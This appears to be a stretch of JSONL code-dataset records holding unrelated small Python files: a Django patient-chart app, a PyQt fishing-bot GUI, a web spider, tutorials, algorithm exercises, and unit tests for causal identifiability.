gef[sum(inputs[:ii]):sum(inputs[:ii])+input], offspring[sum(inputs[:ii]):sum(inputs[:ii])+input], locii, gfitnessref, efitnessref, ref_types,), (individual_cycle, mutation,), (\"numpy\",)) for ii, input in enumerate(inputs)]\n gef = sum([i() for i in job1], []) #summing up the offspring ka gef_transient arrays returned by individual_cycle\n\n#POST PROCESSING OF CODE\n\ngm_forward = []\ngm_backward = []\n\nfor i in range(total_gen-999):\n\n gm_forward += [scipy.stats.mstats.gmean(avg_w[:(1000 + i)])]\n #gm_backward += [scipy.stats.mstats.gmean(avg_w[(99000-i):])]\n\ngm_backward = list(reversed(gm_backward))\n\nwith open('avg_fitnesses2.csv', 'w') as myfile:\n wr = csv.writer(myfile)\n wr.writerow(avg_w)\n\nwith open('gm_forward2.csv', 'w') as myfile:\n wr = csv.writer(myfile)\n wr.writerow(gm_forward)\n\n#with open('gm_backward.csv', 'w') as myfile:\n # wr = csv.writer(myfile)\n # wr.writerow(gm_backward)\n\nplt.figure(figsize=(45, 20))\nplt.plot(generations, avg_w, 'r', ## generations[:99001], gm_backward, 'y',\n generations[999:], gm_forward)\nplt.savefig('monomorphic, double peak, forwards+backwards2.png', bbox_inches = 'tight')\n\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n \n\n \n\n \n","sub_path":"double peak/monomorphic starting gen/150, 000 gen/monomorphic double peak - Copy.py","file_name":"monomorphic double peak - Copy.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585654014","text":"class Point(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n # def __repr__(self):\n # return '({}, {})'.format(self.x, self.y)\n\n # def __str__(self):\n # return '({}, {})'.format(self.x, self.y)\n\n\ndef prepare_points(N, color_str):\n points = []\n for i in range(N):\n tmp = input().split()\n x, y = int(tmp[0]), int(tmp[1])\n point = Point(x, y)\n points.append((point, color_str))\n return points\n\n\ndef main():\n N = int(input())\n red_points = prepare_points(N, 'r')\n blue_points = prepare_points(N, 'b')\n sorted_ = sorted((red_points + blue_points), key=lambda x: x[0].x)\n uses = set()\n count = 0\n for item in sorted_:\n if item[1] == 'r':\n uses.add(item)\n else:\n reds = {\n foo\n for foo in uses if foo[1] == 'r' and foo[0].y < item[0].y\n }\n # print(item, reds)\n if not reds:\n continue\n max_p = max(reds, key=lambda x: x[0].y)\n if max_p[0].y < item[0].y:\n uses.remove(max_p)\n count += 1\n # print(sorted_)\n # print(uses)\n print(count)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc091/main_restartC.py","file_name":"main_restartC.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494925326","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom datetime import datetime\nfrom .models import Patients\nfrom csv import reader\nimport datetime\nimport logging\nimport json\nfrom django.db import connection\nfrom django.db.models import Min, Max\nfrom django.http import JsonResponse\n\n\n# Create your views here.\ndef index(request):\n # return HttpResponse('HELLO FROM CHARTS')\n return render(request, 'charts/index.html')\n\n\ndef upload_csv(request):\n data = {}\n\n if request.method == 'GET':\n return render(request, \"charts/index.html\", data)\n\n # if not GET, then proceed\n try:\n csv_file = request.FILES[\"csv_file\"]\n\n if not csv_file.name.endswith('.csv'):\n messages.error(request, 'File is not CSV type')\n return HttpResponseRedirect(reverse(\"upload_csv\"))\n # if file is too large, return\n if csv_file.multiple_chunks():\n messages.error(request, \"Uploaded file is too big (%.2f MB).\" % (csv_file.size / (1000 * 1000),))\n return HttpResponseRedirect(reverse(\"upload_csv\"))\n\n file_data = csv_file.read().decode(\"utf-8\")\n\n i = 0\n\n lines = file_data.split(\"\\n\")\n\n for line in reader(lines):\n\n if i > 0:\n p = Patients(\n first_name=line[1],\n last_name=line[2],\n gender=line[3],\n date_of_surgery=date_surgery(line[4]),\n icd10procedure=line[5],\n city=line[6],\n date_of_birth=date_birth(line[7]),\n icd10desc=line[8]\n )\n\n p.save()\n\n i += 1\n\n except Exception as e:\n logging.getLogger(\"error_logger\").error(\"Unable to upload file. \" + repr(e))\n messages.error(request, \"Unable to upload file. \" + repr(e))\n\n content = {\n 'line': line,\n 'line_len': len(line),\n 'patient': p,\n }\n\n return render(request, \"charts/show_charts.html\", content)\n\n\n# format birth date from csv\n# mm/dd/yyyy --> yyyy-mm-dd\n# if date from csv empty set default value (1800-01-01)\ndef date_birth(date_birth_from_csv):\n\n if '/' not in date_birth_from_csv:\n return datetime.datetime(year=1800, month=1, day=1)\n\n date_info = date_birth_from_csv.split(\"/\")\n date_month =date_info[0]\n date_day = date_info[1]\n date_year = date_info[2]\n return datetime.datetime(year=int(date_year), month=int(date_month), day=int(date_day))\n\n\n# check surgery date from csv\n# if surgery date from csv empty set default value (1800-01-01)\ndef date_surgery(date_surgery_from_csv):\n\n if '-' not in date_surgery_from_csv:\n return datetime.datetime(year=1800, month=1, day=1)\n\n return date_surgery_from_csv\n\n# get data for D3 charts\ndef charts_data(request):\n\n p = Patients.objects.all()\n\n data_ch01 = data_chart_01()\n data_ch02 = data_chart_02(20, 2016, 3, 2017, 8)\n data_ch03 = data_chart_03()\n data_ch04 = data_chart_04()\n\n min_date = Patients.objects.filter(date_of_surgery__year__gte=1900).aggregate(Min('date_of_surgery'))\n max_date = Patients.objects.all().aggregate(Max('date_of_surgery'))\n\n content = {\n 'data_ch01': json.dumps(data_ch01),\n 'data_ch02': json.dumps(data_ch02),\n 'data_ch03': json.dumps(data_ch03),\n 'data_ch04': json.dumps(data_ch04),\n 'date_min': min_date['date_of_surgery__min'],\n 'date_max': max_date['date_of_surgery__max'],\n 'range_months': range(1, 13),\n }\n\n return render(request, \"charts/show_charts.html\", content)\n\n\n# chart 1 data - number of patients by age range\ndef data_chart_01():\n\n p = Patients.objects.all()\n\n age_range = 5\n age_range_start = 10\n age_range_stop = 80\n\n data = []\n b = {\"X\": \"1-5\", \"Y\": 10}\n\n for age in range (age_range_start, age_range_stop, age_range):\n birth_date_start = date_years_ago(age + age_range - 1)\n birth_date_stop = date_years_ago(age)\n\n p_count = Patients.objects.filter(date_of_birth__range=(birth_date_start, birth_date_stop)).count()\n\n b[\"X\"] = str(age) + '-' + str(age + age_range - 1)\n b[\"Y\"] = p_count\n data.append(b.copy())\n\n return data\n\n\n# count patients by age range for selected months\ndef data_chart_02(age_range, year_start, month_start, year_end, month_end):\n data = []\n\n for year in range(year_start, year_end+1, 1):\n month_from = month_start\n month_to = month_end\n if year != year_start:\n month_from = 1\n if year != year_end:\n month_to = 12\n\n for month in range(month_from, month_to+1, 1):\n\n patients_list = Patients.objects.filter(date_of_surgery__year=year, date_of_surgery__month=month)\n\n tmp = {}\n label_x = str(month) + '/' + str(year)\n tmp[\"X\"] = label_x\n\n age_range_start = 10\n age_range_stop = 80\n\n for age in range(age_range_start, age_range_stop, age_range):\n birth_date_start = date_years_ago(age + age_range - 1)\n birth_date_stop = date_years_ago(age)\n\n patients_count = patients_list.filter(date_of_birth__range=(birth_date_start, birth_date_stop)).count()\n key = str(age) + '-' + str(age + age_range - 1)\n tmp[key] = patients_count\n\n data.append(tmp.copy())\n\n return data\n\n\n# count patients by age range for selected months\ndef data_chart_03():\n data = []\n\n month_start = 2\n month_end = 11\n year_start = 2016\n year_end = 2017\n\n for year in range(year_start, year_end+1, 1):\n month_from = month_start\n month_to = month_end\n if year != year_start:\n month_from = 1\n if year != year_end:\n month_to = 12\n\n for month in range(month_from, month_to+1, 1):\n\n patients_list = Patients.objects.filter(date_of_surgery__year=year, date_of_surgery__month=month)\n\n tmp = {}\n label_x = str(month) + '/' + str(year)\n tmp[\"X\"] = label_x\n\n male_patients_count = patients_list.filter(gender='male').count()\n female_patients_count = patients_list.filter(gender='female').count()\n\n total = male_patients_count + female_patients_count\n if total > 0:\n tmp[\"male\"] = male_patients_count/total\n tmp[\"female\"] = 1-tmp[\"male\"]\n else:\n tmp[\"male\"] = 0.01\n tmp[\"female\"] = 0.01\n\n data.append(tmp.copy())\n # end for year\n\n return data\n\n\n# draw most common procedures\ndef data_chart_04():\n data = []\n\n raw_query = \"SELECT \"\n raw_query += \" substring_index(icd10desc, ' ', 1) as first_word,\"\n raw_query += \" id, count(id) as total\"\n raw_query += \" FROM charts_patients\"\n raw_query += \" WHERE substring_index(icd10desc, ' ', 1) <> ''\"\n raw_query += \" GROUP BY first_word ORDER BY count(id) DESC\"\n\n cursor = connection.cursor()\n cursor.execute(raw_query)\n\n raw_query_result = cursor.fetchall()\n procedures = list(raw_query_result)\n\n procedures_limit = 10\n if len(procedures) < 10:\n procedures_limit = len(procedures)\n\n b = {}\n for i in range(0, procedures_limit, 1):\n b[\"X\"] = procedures[i][0]\n b[\"Y\"] = int(procedures[i][2])\n data.append(b.copy())\n\n return data\n\n\ndef date_years_ago(years, from_date=None):\n\n if from_date is None:\n from_date = datetime.datetime.today()\n\n try:\n return from_date.replace(year=from_date.year - years)\n except ValueError:\n # assert from_date.month == 2 and from_date.day == 29\n return from_date.replace(month=2, day=28, year=from_date.year-years)\n\n\ndef chart02_update(request):\n\n age_range = request.GET.get('age_range', 10)\n year_from = request.GET.get('year_from', 2015)\n month_from = request.GET.get('month_from', 1)\n year_to = request.GET.get('year_to', 2017)\n month_to = request.GET.get('month_to', 12)\n\n data = data_chart_02(\n int(age_range),\n int(year_from),\n int(month_from),\n int(year_to),\n int(month_to)\n )\n\n return JsonResponse(data, safe=False)\n\n","sub_path":"charts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510961832","text":"#PY.01.16 Project 9 : Make your own coin\n# Description: It is program explaining the OOPS concepts of class, object, constructor, destructor.\n#It creates coin with respect to pound class and make the changes with the help of functions defiened\n# Class is the template with the states and behaviour of object type\n# Object is the instance of the class\nclass Pound:\n \n value=1.00\n colour=\"gold\"\n diameter=1.5 #cm\n\n def rust(p):\n p.colour=\"green\"\n\ncoin1=Pound()\ncoin2=Pound()\nprint(type(coin1)) #gives type as class\nprint(coin1.value)\ncoin1.value=1.4 #we have assigned a new value\nprint(coin1.value) # this new value will be only for that specific object\nprint(coin2.value)\ncoin1.rust()\nprint(coin1.colour)\n\n\nclass Pound2:\n def __init__(self,rare=False): #Constructor\n\n self.rare=rare\n if self.rare:\n self.symbol=\"tails\" \n else:\n self.symbol = \"heads\"\n\n self.colour=\"gold\"\n self.diameter=1.12 #cm\n def __del__(self): #Destructor\n print(\"coin spent\")\n \n def rust(self): \n self.colour=\"green\"\n def clean(self):\n self.colour=\"gold\"\n \n \ncoin1=Pound2(rare=True) #We can give the arguments with class name if we have constructor\nprint(coin1.symbol)\ncoin4=Pound2()\nprint(coin4.symbol)\ncoin1.rust()\nprint(coin1.colour)\ncoin1.clean()\nprint(coin1.colour)\ncoin5=Pound2()\ndel coin5\nprint(coin5.colour) #it shows not defined since it is destructed\n \n","sub_path":"Make_Your_Coin.py","file_name":"Make_Your_Coin.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"483085933","text":"import imagesearch\nimport gui\nimport subprocess\nimport time\n#from PyQt5 import QtCore, QtGui, QtWidgets \nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nimport traceback,sys\n\n\nclass Thread(QThread):\n def __init__(self, fn, f=False):\n super(Thread, self).__init__()\n signal = pyqtSignal(object)\n self.f=f\n self.fn=fn\n\n # run method gets called when we start the thread\n\n def run(self):\n print(\"starting thread\")\n if self.f:\n result = self.fn(w).CheckArea()\n else:\n result = self.fn()\n \n\n #w.gui.catched_edit.setText(str(process.fish_count))\n #w.gui.status_edit.setText(str(process.status))\n def stop(self):\n print(\"thread ended\")\n self.terminate()\n \n\nclass Timer:\n def __init__(self,duration):\n super(Timer, self).__init__()\n self.dur = duration\n self.elapsed_s = 0\n self.elapsed_m = 0\n self.elapsed_h = 0\n self.total=0\n\n def timer(self):\n while (self.total<=(self.dur*60)) and (w.gui.stoppedLabel.text()==\"\"):\n if self.elapsed_m<=59:\n if self.elapsed_s<=59:\n self.elapsed_s+=1\n else:\n self.elapsed_s=0\n self.elapsed_m+=1\n else:\n self.elapsed_h+=1\n self.elapsed_m=0\n time_text=str(self.elapsed_h) + \":\" + str(self.elapsed_m) + \":\" + str(self.elapsed_s)\n w.gui.time_edit.setText(time_text)\n self.total+=1\n time.sleep(1)\n w.gui.stoppedLabel.setText(\"Stopped\")\n w.Clear()\n\nclass AppWindow(QMainWindow):\n def __init__(self):\n super(AppWindow, self).__init__()\n self.gui = gui.Ui_Window()\n self.gui.setupUi(self)\n self.fish_thread = Thread(imagesearch.Fishit, f=True)\n self.gui.fish_button.clicked.connect(self.FishButton)\n #self.fish_thread.signal.connect(self.gui.status_label.setText)\n #self.fish_thread.signal.connect(self.finished)\n self.gui.stop_button.clicked.connect(self.Stop)\n\n def FishButton(self):\n duration = int(self.gui.duration.currentText())\n self.gui.fish_button.setEnabled(False)\n self.gui.stoppedLabel.setText(\"\")\n self.fish_thread.start()\n self.timer = Thread(Timer(duration).timer)\n self.timer.start()\n\n def Stop(self):\n self.gui.stoppedLabel.setText(\"Stopped\")\n self.timer.stop()\n self.Clear()\n self.time=0\n\n def Clear(self):\n self.gui.time_edit.setText(\"0:0:0\")\n self.gui.catched_edit.setText(\"\")\n self.gui.status_edit.setText(\"\")\n self.gui.fish_button.setEnabled(True)\n\nif __name__ == \"__main__\":\n app=QApplication(sys.argv)\n w=AppWindow()\n w.show()\n app.exec_()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596188635","text":"import re\nfrom utils.url_utils import capture_urls\n\nMISSING_TAG_MESSAGE = \"\"\nBAD_REGISTER_COMMAND = \"\"\nREGISTER_SUCCESS = \"\"\nOTHERL_ERROR = \"\"\n\n\ndef fix_url_if_comes_in_list(url):\n if isinstance(url, str):\n pattern = re.compile(r\"^\\[.*\\]$\")\n if pattern.match(url) is not None:\n url = url[1:]\n url = url[:-1]\n return url\n return url\n\n\ndef is_image_url(url):\n pattern = re.compile(r\"http.*(\\.jpg)|(\\.png)|(\\.gif)|(\\.jpeg)$\")\n print(pattern.match(url) is not None)\n return pattern.match(url) is not None\n\n\ndef is_change_tag_message(message):\n pattern = re.compile(r\"^/tag(\\s[\\w\\-]+)*$\")\n print(pattern.match(message) is not None)\n return pattern.match(message) is not None\n\n\ndef get_amazon_tag(message):\n pattern = re.compile(r\"^(/tag)\\s([\\w\\-]+)$\")\n if pattern.match(message) is not None:\n return pattern.match(message).group(2)\n else:\n return None\n\n\ndef get_coupon_info(message):\n\n pattern = re.compile(r\"^/[Cc]upon\\s(\\w+)\\s([$?\\d\\,\\.\\']+[€$]?)\\s(http.*)$\")\n if pattern.match(message) is not None:\n groups = pattern.match(message).groups()\n code = groups[0]\n price = groups[1]\n urls = capture_urls(groups[2])\n return {'code': code,\n 'final_price': price,\n 'urls': urls}\n else:\n return None","sub_path":"utils/regex_utils.py","file_name":"regex_utils.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"409036221","text":"from math import sqrt, ceil\r\n\r\nhighestPrime=0\r\ndef prime(num):\r\n\tif 600851475143%num==0:\r\n\t\tisPrime = primeCheck(num)\r\n\t\tif isPrime:\r\n\t\t\tprint(\"%d is prime\" % num)\r\n\r\ndef primeCheck(num):\r\n\tif num%2 == 0:\r\n\t\treturn False\r\n\tfor i in range(3, ceil(sqrt(num))+1, 2):\r\n\t\tif num%i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\ndef main():\r\n\tfor i in range(1, 10000000):\r\n\t\tprime(i)\r\n#if __name__ == '__main__':\r\nmain()\r\n","sub_path":"1-10/Largest prime factor.py","file_name":"Largest prime factor.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571734926","text":"import scrapy\nimport json\nfrom selenium import webdriver\nimport sys\n\nclass GolukSpider(scrapy.Spider):\n name = \"letv\"\n\n def __init__(self):\n self.driver = webdriver.Firefox()\n\n def start_requests(self):\n url = 'http://camera.leautolink.com/share/share.jsp?id=72790'\n yield scrapy.Request(url=url, callback=self.parse)\n # for i in range(1106000):\n # url = 'http://wap.che.360.cn/share/h5/detail/{}'.format(i)\n # yield scrapy.Request(url=url, callback=self.parse)\n\n\n def parse(self, response):\n self.driver.get(response.url)\n\n while True:\n next = self.driver.find_element_by_id('player_img')\n try:\n # self.driver.implicitly_wait(1)\n # next.click()\n path = response.css(\"#player_img\").extract_first()\n print(path)\n # yield {\n # \"path\": path,\n # }\n except:\n e = sys.exc_info()[0]\n print(e)\n break\n\n self.driver.close()\n","sub_path":"ruki_spider/spiders/letv.py","file_name":"letv.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246133245","text":"\"\"\"\n程序中如果出现了异常/错误,整个程序会直接退出,这样不科学\n我们需要对异常进行处理\n\"\"\"\n\n# print(1)\n# 1/0\n# print(2)\n\n\n# 1.异常处理:哪里有异常就将它放到 try 语句中,\n# 执行顺序:从上到下,进入try语句中执行,\n# 如果try语句中没有出现异常,\n# 程序不会走except,而是直接向下执行,\n# 如果出现了异常,try中错误后面的语句不会再执行了\n# 直接进入except,条件是捕获了这类异常,\n# 如果没有捕获这一类,会直接跳出程序\n\n# print(0)\n# try:\n# print(1)\n# 1/0\n# print(2)\n# except ZeroDivisionError as e:\n# print(\"捕获到异常了,你的除数为0了\")\n# print(e)\n# print(3)\n#\n# try:\n# print(1)\n# int(\"ase\")\n# print(2)\n# except ValueError as e:\n# print(\"捕获到异常了\")\n# print(e)\n\n# 一次只可以捕获对应的异常,不同类型捕获不了\n# 必须对应的异常名字 才能捕获,要不报错\n\n# 2.如何捕获多个异常\n# try:\n# print(1)\n# 1/0\n# int(\"ase\")\n# print(2)\n# except (ValueError, ZeroDivisionError) as e:\n# print(\"捕获到异常了1111\")\n# print(e)\n\n\n# try:\n# print(1)\n# 1/0\n# int(\"ase\")\n# print(2)\n# except (ValueError, ZeroDivisionError) as e:\n# print(\"捕获到异常了1111\")\n# print(e)\n\n\n# 3.使用常见类型的基类 捕获一些常见的异常\n\n# print(0)\n# try:\n# print(1)\n# int(\"ase\")\n# 1/0\n# print(2)\n# except Exception as e:\n# print(\"捕获到异常了1111\")\n# print(e)\n\n\"\"\"\nPython的常见异常类型:\n\nBaseException 所有异常的基类\n SystemExit 解释器请求退出\n KeyboardInterrupt 用户中断执行(通常是输入^C)\n GeneratorExit 生成器(generator)发生异常来通知退出\n Exception 常规错误的基类\n ZeroDivisionError 除(或取模)零 (所有数据类型)\n AttributeError 对象没有这个属性\n StopIteration 迭代器没有更多的值\n IOError 输入/输出操作失败\n OSError 操作系统错误\n ImportError 导入模块/对象失败\n IndexError 序列中没有此索引(index)\n KeyError 映射中没有这个键\n MemoryError 内��溢出错误(对于Python 解释器不是致命的)\n NameError 未声明/初始化对象 (没有属性)\n RuntimeError 一般的运行时错误\n NotImplementedError 尚未实现的方法\n IndentationError 缩进错误\n SystemError 一般的解释器系统错误\n TypeError 对类型无效的操作\n ValueError 传入无效的参数\n\n Warning 警告的基类\n\"\"\"\n# IndexError\nli = [1, 2, 5, 6]\n# li[9]\n\n# StopIteration 迭代器没有更多的值\n# a = iter(li)\n# next(a)\n# next(a)\n# next(a)\n# next(a)\n# next(a)\n\n\n# 4.try except 后面可以跟else\n# else 执行的世纪:如果没有走except就会走else\n# print(0)\n# try:\n# print(1)\n# # 1/0\n# # int(\"ase\")\n# print(2)\n# except Exception as e:\n# print(e)\n# else:\n# print(\"dui\")\n#\n# print(3)\n\n\n# 5.\ntry:\n print(1)\n # 1.连接数据库\n # 2.操作数据库\n # 3.关闭连接\n 1/0\nexcept Exception as e:\n print(e)\nfinally: # 就算try语句中的异常没有被捕获,也会执行执行\n print(\"无论报错不报错我都会执行\")\n\n","sub_path":"woniu_workspace/python/day06/a01_异常处理.py","file_name":"a01_异常处理.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148909444","text":"import ReadSMD_eTree as smd\nimport time\n\nstart_time = time.time()\n\ntable = smd.xmlSMD2ListofDictionaries(r'data\\smd.xml')\n\nwith open(r'data\\data.txt','w') as file:\n\n for row in table:\n \n file.write('----------------------------------------------\\n')\n \n for field in row:\n \n if not row[field] is None:\n \n file.write(field + ' = ' + row[field] + '\\n')\n \n else:\n \n file.write(field + ' = NONE\\n')\n \nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"writeTextFile.py","file_name":"writeTextFile.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77656908","text":"import sublime, sublime_plugin\nfrom . import latexconverter\n\nclass LatexToWpCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tlatex = self.view.substr(sublime.Region(0, self.view.size()))\n\t\tconverter = latexconverter.LatexConverter()\n\t\twp = converter.latex2wp(latex)\n\n\t\tv = self.view.window().new_file()\n\t\tv.set_scratch(True)\n\t\tv.insert(edit, 0, wp)\n\n","sub_path":"latex2wp.py","file_name":"latex2wp.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5195041","text":"\"\"\"\nPackage: State Machine\nFile: SMControls\n\n\n\"\"\"\n\nimport sm \nfrom primitives import *\n\nclass PID(sm.SM):\n def __init__(self, Kp, Ki, Kd):\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n \n self.machine = ParallelAdd(Gain(Kp), \\\n ParallelAdd(Cascade(Gain(Ki), Integrator()), \\\n Cascade(Gain(Kd), Derivative())))\n \n self.startState = self.machine.startState\n\n\n def getNextValues(self, state, inp):\n return self.machine.getNextValues(state, inp)\n\n\n\n","sub_path":"lib/statemachine/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240946974","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\ndef formataData(data):\n\ttry:\n\t\tdia = data[0:2]\n\t\tmes = data[2:4]\n\t\tano = data[4:8]\n\n\t\treturn datetime.date(int(ano), int(mes), int(dia))\n\texcept:\n\t\treturn None","sub_path":"mscmcldap/util/date_util.py","file_name":"date_util.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"478473040","text":"#!/usr/bin/env python3\n\n# Written by Thomas York\n\n# Imports\n\nimport zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.SUB)\n\nprint(\"Testing ZeroMQ datafeed of terminal information...\")\nsocket.connect('tcp://127.0.0.1:5556')\nsocket.setsockopt(zmq.SUBSCRIBE, b'')\n\nwhile True:\n message = socket.recv_string()\n print(message)\n","sub_path":"test-terminal.py","file_name":"test-terminal.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"555772699","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Tests for the identify algorithm.\"\"\"\n\nimport unittest\nfrom typing import Union\n\nfrom y0.dsl import Distribution, P, Probability, X, Y, Z\nfrom y0.graph import NxMixedGraph\nfrom y0.identify import _get_to, is_identifiable\n\n\nclass TestUtils(unittest.TestCase):\n \"\"\"Test utility functions for ID algorithms.\"\"\"\n\n def test_to(self):\n \"\"\"Test getting treatments and outcomes.\"\"\"\n with self.assertRaises(ValueError):\n _get_to(P(X))\n with self.assertRaises(ValueError):\n _get_to(P(X, Y))\n with self.assertRaises(ValueError):\n _get_to(P(X @ Y, X @ Z))\n\n for expected_t, expected_o, probability in [\n ([\"X\"], [\"Y\"], P(Y @ X)),\n ([\"X\"], [\"Y\", \"Z\"], P(Y @ X, Z @ X)),\n ]:\n t, o = _get_to(probability)\n self.assertEqual(expected_t, t)\n self.assertEqual(expected_o, o)\n\n\nclass TestNotIdentifiable(unittest.TestCase):\n \"\"\"Tests for lack of identifiability.\n\n These tests are based on the examples from the Figure 1 series on\n https://github.com/COVID-19-Causal-Reasoning/Y0/blob/master/ID_whittemore.ipynb.\n \"\"\"\n\n def assert_not_identifiable(\n self, graph: NxMixedGraph, query: Union[Probability, Distribution]\n ) -> None:\n \"\"\"Asset the graph is not identifiable under the given query.\"\"\"\n self.assertFalse(is_identifiable(graph, query))\n\n def test_figure_1a(self):\n \"\"\"Test Figure 1A.\"\"\"\n graph_1a = NxMixedGraph()\n graph_1a.add_directed_edge(\"X\", \"Y\")\n graph_1a.add_undirected_edge(\"X\", \"Y\")\n self.assert_not_identifiable(graph_1a, P(Y @ ~X))\n\n def test_figure_1b(self):\n \"\"\"Test Figure 1B.\"\"\"\n graph_1b = NxMixedGraph()\n graph_1b.add_directed_edge(\"X\", \"Z\")\n graph_1b.add_directed_edge(\"Z\", \"Y\")\n graph_1b.add_undirected_edge(\"X\", \"Z\")\n self.assert_not_identifiable(graph_1b, P(Y @ ~X))\n\n def test_figure_1c(self):\n \"\"\"Test Figure 1c.\"\"\"\n graph_1c = NxMixedGraph()\n graph_1c.add_directed_edge(\"X\", \"Z\")\n graph_1c.add_directed_edge(\"Z\", \"Y\")\n graph_1c.add_directed_edge(\"X\", \"Y\")\n graph_1c.add_undirected_edge(\"X\", \"Z\")\n self.assert_not_identifiable(graph_1c, P(Y @ ~X))\n\n def test_figure_1d(self):\n \"\"\"Test Figure 1d.\"\"\"\n graph_1d = NxMixedGraph()\n graph_1d.add_directed_edge(\"X\", \"Y\")\n graph_1d.add_directed_edge(\"Z\", \"Y\")\n graph_1d.add_undirected_edge(\"X\", \"Z\")\n graph_1d.add_undirected_edge(\"Z\", \"Y\")\n self.assert_not_identifiable(graph_1d, P(Y @ ~X))\n\n def test_figure_1e(self):\n \"\"\"Test Figure 1e.\"\"\"\n graph_1e = NxMixedGraph()\n graph_1e.add_directed_edge(\"Z\", \"X\")\n graph_1e.add_directed_edge(\"X\", \"Y\")\n graph_1e.add_undirected_edge(\"X\", \"Z\")\n graph_1e.add_undirected_edge(\"Z\", \"Y\")\n self.assert_not_identifiable(graph_1e, P(Y @ ~X))\n\n def test_figure_1f(self):\n \"\"\"Test Figure 1f.\"\"\"\n graph_1f = NxMixedGraph()\n graph_1f.add_directed_edge(\"X\", \"Z\")\n graph_1f.add_directed_edge(\"Z\", \"Y\")\n graph_1f.add_undirected_edge(\"X\", \"Y\")\n graph_1f.add_undirected_edge(\"Z\", \"Y\")\n self.assert_not_identifiable(graph_1f, P(Y @ ~X))\n\n def test_figure_1g(self):\n \"\"\"Test Figure 1g.\"\"\"\n graph_1g = NxMixedGraph()\n graph_1g.add_directed_edge(\"X\", \"Z1\")\n graph_1g.add_directed_edge(\"Z1\", \"Y\")\n graph_1g.add_directed_edge(\"Z2\", \"Y\")\n graph_1g.add_undirected_edge(\"X\", \"Z2\")\n graph_1g.add_undirected_edge(\"Z1\", \"Z2\")\n self.assert_not_identifiable(graph_1g, P(Y @ ~X))\n\n def test_figure_1h(self):\n \"\"\"Test Figure 1h.\"\"\"\n graph_1h = NxMixedGraph()\n graph_1h.add_directed_edge(\"Z\", \"X\")\n graph_1h.add_directed_edge(\"X\", \"W\")\n graph_1h.add_directed_edge(\"W\", \"Y\")\n graph_1h.add_undirected_edge(\"X\", \"Z\")\n graph_1h.add_undirected_edge(\"X\", \"Y\")\n graph_1h.add_undirected_edge(\"W\", \"Z\")\n graph_1h.add_undirected_edge(\"Y\", \"Z\")\n self.assert_not_identifiable(graph_1h, P(Y @ ~X))\n\n\nclass TestIdentifiable(unittest.TestCase):\n \"\"\"Tests for lack of identifiability.\n\n These tests are based on the examples from the Figure 2 series on\n https://github.com/COVID-19-Causal-Reasoning/Y0/blob/master/ID_whittemore.ipynb.\n \"\"\"\n\n def assert_identifiable(\n self, graph: NxMixedGraph, query: Union[Probability, Distribution]\n ) -> None:\n \"\"\"Assert the graph is identifiable under the given query.\"\"\"\n self.assertTrue(is_identifiable(graph, query))\n\n def test_figure_2a(self):\n \"\"\"Test Figure 2a.\"\"\"\n graph_2a = NxMixedGraph()\n graph_2a.add_directed_edge(\"X\", \"Y\")\n self.assert_identifiable(graph_2a, P(Y @ ~X))\n\n def test_figure_2b(self):\n \"\"\"Test Figure 2B.\"\"\"\n graph_2b = NxMixedGraph()\n graph_2b.add_directed_edge(\"X\", \"Y\")\n graph_2b.add_directed_edge(\"X\", \"Z\")\n graph_2b.add_directed_edge(\"Z\", \"Y\")\n graph_2b.add_undirected_edge(\"Y\", \"Z\")\n self.assert_identifiable(graph_2b, P(Y @ ~X))\n\n def test_figure_2c(self):\n \"\"\"Test Figure 2C.\"\"\"\n graph_2c = NxMixedGraph()\n graph_2c.add_directed_edge(\"X\", \"Y\")\n graph_2c.add_directed_edge(\"Z\", \"X\")\n graph_2c.add_directed_edge(\"Z\", \"Y\")\n graph_2c.add_undirected_edge(\"Y\", \"Z\")\n 